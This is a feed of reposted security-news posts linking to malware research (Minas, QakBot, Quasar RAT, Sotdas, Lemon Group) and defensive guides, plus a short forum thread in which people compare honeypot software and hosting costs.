Recently we found a suspicious shellcode running in the memory of a system process. We decided to investigate how the shellcode was initially placed into the process and where on the infected system the threat was hidden.

We named this #malware #Minas 👉 https://kas.pr/fn5y
🗣e_kaspersky


🎖@malwr

This is interesting reading regarding the .zip TLD. However, it's of near zero consequence to phishing attacks, read it first then I'll explain: https://medium.com/@bobbyrsec/the-dangers-of-googles-zip-tld-5e1e675e59a5
🗣troyhunt


🎖@malwr

Ppl that run an honeypot: what hosting company are you using? What is your fav software?
Hi all,
I’d like to run an honeypot in the hope to collect some current malware samples. If you are an honeypot admin, then I have some questions for you:

1) what software are you running? And why?
2) what is the hosting company that is hosting your honeypot/honeypots?
3) How much do you pay every month?
4) what software would you suggest for a cheap/low end VPS?
5) after how much hours/days have you collected the 1st binary sample in your honeypot?

I have done some research and I found an incredible AIO solution called T-POT. It is a collection of the most used honeypots (cowrie, dionaea etc.) but it requires 8+ GB of ram and 150GB of HDD space… so it will not be cheap to host this 😕

Thanks a lot!
🗣Luca-91

I run a custom HTTP honeypot at the edge of my home network and on a cheapy VPS. I'm able to find command injection attempts in payload and headers which usually yield Mirai and Mozi samples.

Overall, I collect the request data and store it in a MySQL table for aggregating stats.
👤issued-username

T-pot, set a few malware files in the server as well
👤dumpsteraccount01

I run 3 honeypots on EC2/Lightsail instances at AWS. I am using mainly Snort/Suricata to detect attacks against the devices - not so much a 'honeypot' but I am in the process of standing up more low-interaction true honeypots on the platform. Lightsail can do fixed cost of like $5/$10/$20 etc price points, overall price with a syslog server to aggregate everything is like $30-40 per month or something, maybe a little less. Hard to tell since I am running lots of other things on AWS.

T-POT is extreme end of honeypots..not worth it for me.

Self-Promotion: https://beesting.tools/
👤panscanner


🎖@malwr

GitHub - imthenachoman/How-To-Secure-A-Linux-Server: An evolving how-to guide for securing a Linux server. https://github.com/imthenachoman/How-To-Secure-A-Linux-Server
🗣akaclandestine


🎖@malwr

Team Cymru's S2 Research Team look at the QakBot infrastructure, drawing out some high-level trends and anomalies based on their ongoing tracking of the malware's command-and-control (C2) infrastructure. https://www.team-cymru.com/post/visualizing-qakbot-infrastructure
🗣virusbtn


🎖@malwr

Security researcher @embee_research analyses the Quasar RAT C2 configuration and uses this information to pivot to additional servers utilising Shodan and Censys. https://embee-research.ghost.io/hunting-quasar-rat-shodan/
🗣virusbtn


🎖@malwr

Insider Threat Mitigation Guide
Source: Cybersecurity & Infrastructure Security Agency
Download Link:
https://www.cisa.gov/sites/default/files/publications/Insider%20Threat%20Mitigation%20Guide_Final_508.pdf
For more unique resources and tools for the cyber community, please visit:
https://cyberstartupobservatory.com/cyber-startup-observatory-community/
#CyberSecurity #InfoSec #InformationSecurity
🗣JMonteagudoE


🎖@malwr

New Strain of Sotdas Malware Discovered | Qualys Security Blog https://blog.qualys.com/vulnerabilities-threat-research/2023/05/17/new-strain-of-sotdas-malware-discovered
🗣Cyber_O51NT


🎖@malwr

Trend Micro’s Fyodor Yarochkin, Zhengyu Dong & Paul Pajares present an overview of the Lemon Group’s use of pre-infected mobile devices and how this scheme is potentially being developed and expanded to other IoT devices. https://www.trendmicro.com/en_us/research/23/e/lemon-group-cybercriminal-businesses-built-on-preinfected-devices.html
🗣virusbtn


🎖@malwr